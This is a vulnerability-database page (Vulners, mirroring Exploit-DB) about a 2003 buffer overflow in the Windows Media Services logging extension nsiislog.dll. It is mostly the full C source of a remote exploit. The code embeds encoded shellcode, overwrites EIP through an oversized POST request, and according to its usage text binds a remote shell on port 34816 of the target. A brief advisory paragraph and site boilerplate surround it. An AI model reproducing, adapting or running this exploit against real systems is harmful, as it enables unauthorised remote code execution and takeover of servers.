Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow

🗓️ 25 Jun 2003 00:00:00Reported by firew0rkerType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 33 Views

Buffer overflow in Windows Media Services could allow remote code execution via logging extension.

Code
// source: https://www.securityfocus.com/bid/8035/info

Microsoft has reported a buffer overflow vulnerability in Windows Media Services. This is due to a problem with how the logging ISAPI extension handles incoming client requests. This could cause arbitrary code execution in IIS, which is exploitable through Media Services.

// Windows Media Services Remote Command Execution #2 
// v. 1.0 beta 
// (c) firew0rker  //tN  [The N0b0D1eS] 

#include <stdio.h> 
#include <string.h> 
#include <stdlib.h> 

#ifdef WIN32 
#include <winsock.h> 
#pragma comment(lib, "wsock32") 
#else 
#include <sys/socket.h> 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#include <unistd.h> 
#define SOCKET int 
#define DWORD uint32_t 
#define ULONG unsigned long 
#define INVALID_SOCKET -1 
#define SOCKET_ERROR -1 
#define closesocket close 
#endif 

char shellcode[]= 
//"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï⤪¨ 
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff" 
"\xff\x5b\x81\xeb\x4d\x43\x22\x11" 
"\x8b\xc3\x05\x66\x43\x22\x11\x66" 
"\xb9\x15\x03\x80\x30\xfb\x40\x67" 
"\xe2\xf9\x33\xa3\xf9\xfb\x72\x66" 
"\x53\x06\x04\x04\x76\x66\x37\x06" 
"\x04\x04\xa8\x40\xf6\xbd\xd9\xea" 
"\xf8\x66\x53\x06\x04\x04\xa8\x93" 
"\xfb\xfb\x04\x04\x13\x91\xfa\xfb" 
"\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e" 
"\x53\x06\x04\x04\xab\x04\x6e\x37" 
"\x06\x04\x04\xf0\x3b\xf4\x7f\xbe" 
"\xfa\xfb\xfb\x76\x66\x3b\x06\x04" 
"\x04\xa8\x40\xba\xbd\xd9\xea\xf8" 
"\x66\x53\x06\x04\x04\xa8\xab\x13" 
"\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05" 
"\x04\x04\xab\x93\xfa\xfa\xfb\xfb" 
"\x04\x6e\x4b\x06\x04\x04\xc8\x20" 
"\xa8\xa8\xa8\x91\xfd\x91\xfa\x91" 
"\xf9\x04\x6e\x3b\x06\x04\x04\x72" 
"\x7e\xa7\x05\x04\x04\x9d\x3c\x7e" 
"\x9f\x05\x04\x04\xf9\xfb\x9d\x3c" 
"\x7e\x9d\x05\x04\x04\x73\xfb\x3c" 
"\x7e\x93\x05\x04\x04\xfb\xfb\xfb" 
"\xfb\x76\x66\x9f\x05\x04\x04\x91" 
"\xeb\xa8\x04\x4e\xa7\x05\x04\x04" 
"\x04\x6e\x47\x06\x04\x04\xf0\x3b" 
"\x8f\xe8\x76\x6e\x9c\x05\x04\x04" 
"\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46" 
"\xfb\xfb\xfb\x10\x2f\x91\xfa\x04" 
"\x4e\xa7\x05\x04\x04\x04\x6e\x43" 
"\x06\x04\x04\xf0\x3b\xf4\x7e\x5e" 
"\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04" 
"\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b" 
"\x05\x04\x04\xab\x76\x7e\x9f\x05" 
"\x04\x04\xab\x04\x4e\xa7\x05\x04" 
"\x04\x04\x6e\x4f\x06\x04\x04\x72" 
"\x7e\xa3\x05\x04\x04\x07\x76\x46" 
"\xf3\x05\x04\x04\xc8\x3b\x42\xbf" 
"\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf" 
"\x05\x04\x04\xfb\xfa\xfb\xfb\x70" 
"\x7e\xa3\x05\x04\x04\x72\x7e\xbf" 
"\x05\x04\x04\x72\x7e\xb3\x05\x04" 
"\x04\x72\x7e\xbb\x05\x04\x04\x3c" 
"\x7e\xf3\x05\x04\x04\xbf\xfb\xfb" 
"\xfb\xc8\x20\x76\x7e\x03\x06\x04" 
"\x04\xab\x76\x7e\xf3\x05\x04\x04" 
"\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3" 
"\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9" 
"\xea\xf8\x7e\x53\x06\x04\x04\xab" 
"\xa8\x04\x6e\x3f\x06\x04\x04\x04" 
"\x4e\xa3\x05\x04\x04\x04\x6e\x57" 
"\x06\x04\x04\x12\xa0\x04\x04\x04" 
"\x04\x6e\x33\x06\x04\x04\x13\x76" 
"\xfa\xfb\xfb\x33\xef\xfb\xfb\xac" 
"\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7" 
"\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe" 
"\xd9\xea\xf8\xff\xdf\x78\x3f\xff" 
"\xab\x9f\x9c\x04\xcd\xfb\xfb\x72" 
"\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a" 
"\xd7\xdf\xd8\xbe\xd9\xea\x43\xac" 
"\xbe\xd9\xea\xf8\xff\xdf\x78\x3f" 
"\xff\x72\xbe\x07\x9f\x9c\x72\xdd" 
"\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4" 
"\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d" 
"\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e" 
"\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa" 
"\xfb\x10\x19\x72\x86\x0b\x72\x8e" 
"\x17\x70\x86\xf7\x42\x6d\xfb\xfb" 
"\xfb\xc9\x3b\x09\x55\x72\x86\x0f" 
"\x70\x34\xd0\xb6\xf7\x70\xad\x83" 
"\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6" 
"\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b" 
"\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe" 
"\x78\x3f\xff\x10\xf1\xa2\x78\x38" 
"\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0" 
"\xb9\xe3\x8e\xf9\x10\xb8\x70\x89" 
"\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d" 
"\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b" 
"\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb" 
"\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6" 
"\xf7\x70\xa6\xeb\x72\xf8\x78\x96" 
"\xeb\xff\x70\x8e\x17\x7b\xc2\xfb" 
"\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb" 
"\x78\x3f\xff\xa5\xa4\x32\x39\xf7" 
"\xfb\x70\x86\x0b\x12\x99\x04\x04" 
"\x04\x33\xfb\xfb\xfb\x70\xbe\xeb" 
"\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb" 
"\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32" 
"\x38\xb7\x94\x9a\x9f\xb7\x92\x99" 
"\x89\x9a\x89\x82\xba\xfb\xbe\x83" 
"\x92\x8f\xab\x89\x94\x98\x9e\x88" 
"\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e" 
"\xab\x89\x94\x98\x9e\x88\x88\xba" 
"\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9" 
"\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba" 
"\xa8\x94\x98\x90\x9e\x8f\xba\xfb" 
"\x99\x92\x95\x9f\xfb\x97\x92\x88" 
"\x8f\x9e\x95\xfb\x9a\x98\x98\x9e" 
"\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f" 
"\x9a\x89\x8f\x8e\x8b\xfb\x98\x97" 
"\x94\x88\x9e\x88\x94\x98\x90\x9e" 
"\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9" 
"\xc4\xfc\xff\xff\x74\xf9\x75\xf7"; 


const DWORD default_EIP_pos = 9992; //¯®«®¦¥­¨¥ EIP ¢ ¡ãà(sploit) 
const DWORD default_EBX_points_to = 9988; //㧠⥫ì EBX ®⭮ᥫ쭮 sploit 
//const DWORD default_EIP_value = 0x77F8441B; //¯® í¬ã¤à¤.¡. JMP EDX, ¢ ¤ ­­®¬ áç í ¢ ntdll.dll 
const DWORD default_EIP_value = 0x40F01333; 
//const default_EDX_points_to = 0x1000; //í ­¥ ¯ਣ®¤¨«®á
char *nsiislog_default = "/scripts/nsiislog.dll"; 
char sploit[default_EIP_pos+4+sizeof(shellcode)+1]; 
char sploitbuf[sizeof(sploit)*2]; 

void usage(char* argv[]) 
{ 
       printf("Dicklamer (: " 
   "We are not responsible for the illegal use of this software.\n" 
   "Description: Binds shell to port 34816 (or higher if port busy).\n" 
   "Usage:   " 
   "%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n" 
   "Supported target(s):\n" 
   "Windows version\t\t\t\tnsiislog.dll version\n" 
   "------------------------------------------------------------\n" 
   "2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]); 
       exit(0); 
} 

int main(int argc, char* argv[]) 
{ 
#ifdef WIN32 
   WSADATA wsaData;        
#endif 
   int target_port = 80; 
   char *nsiislog = nsiislog_default; 
   int      nArgIndex; 

   if (argc<2) usage(argv); 
   nArgIndex = 1; 
   while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-')) 
   { 
      switch (argv[nArgIndex++][1]) 
      { 
      case 'p': 
      case 'P': 
         target_port = atoi(argv[nArgIndex++]); 
         continue; 
      case 'r': 
      case 'R': 
         nsiislog = argv[nArgIndex++]; 
         continue; 
      default: 
         usage(argv); 
      } 
   } 
    
   try { 
#ifdef WIN32 
      WSAStartup(0x0101, &wsaData); 
#endif 
      SOCKET s = socket(AF_INET,SOCK_STREAM,0); 
      if (s == INVALID_SOCKET) throw("No socket"); 
      sockaddr_in addr; 
       
      //.¯।¥«塞  ¤à ᢠª 
      ULONG iaddr = inet_addr(argv[1]); 
      if (iaddr == INADDR_NONE) {//.¤à - ¨¬ï¥àª 
         hostent *ph = gethostbyname(argv[1]); 
         if (!ph) throw("Cant resolve hostname"); 
         memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr)); 
      } else {//.¤à - IP 
         memcpy(&addr.sin_addr.s_addr,&iaddr,4); 
      }; 
       
      addr.sin_family = AF_INET; 
      addr.sin_port   = htons(target_port); 
      int sizeofaddr=sizeof(addr); 

char *req = "MX_STATS_LogLine: "; 
strcpy(sploit, req); 
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req)); 
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã â\0*/); 
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã â\0*/); 
//¯à¯¥à®¤¥ ­  EIP, EBX ¡㤥⪠§ëâ­  ¯®᫥¤­¨© DWORD ­ 襣® § ¯à , £¤¥ JZ/JNZ 
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); 
       
      /*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/ 
      sploit[sizeof(sploit)-1] = 0; 
       
  if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host"); 

      sprintf(sploitbuf, 
         "POST %s HTTP/1.0\r\n" 
         "Accept: */*\r\n" 
         "User-Agent: NSPlayer/4.1.0.3917\r\n" 
         "Content-Type: text/plain\r\n" 
         "Content-Length: %i\r\n" 
         "Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n" 
         "\r\n%s\r\n", 
         nsiislog,strlen(sploit),sploit); 
       
      int snd=send(s,sploitbuf,strlen(sploitbuf),0); 
      if (snd == strlen(sploitbuf)) printf("Target exploited.\n"); 
         else throw("Cant send exploit"); 
      closesocket(s); 
   } 
   catch (char *errmsg) 
   { 
       
      printf("%s\n",errmsg); 
      return -1; 
   } 
   catch (int err_n) 
   { 
      printf("error %i\n",err_n); 
      return err_n; 
   } 
#ifdef WIN32 
    WSACleanup(); 
#endif 
   return 0; 
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jun 2003 00:00Current
7.4High risk
Vulners AI Score7.4
buffer overflow vulnerabilitywindows media servicesremote code executionlogging isapi extension
33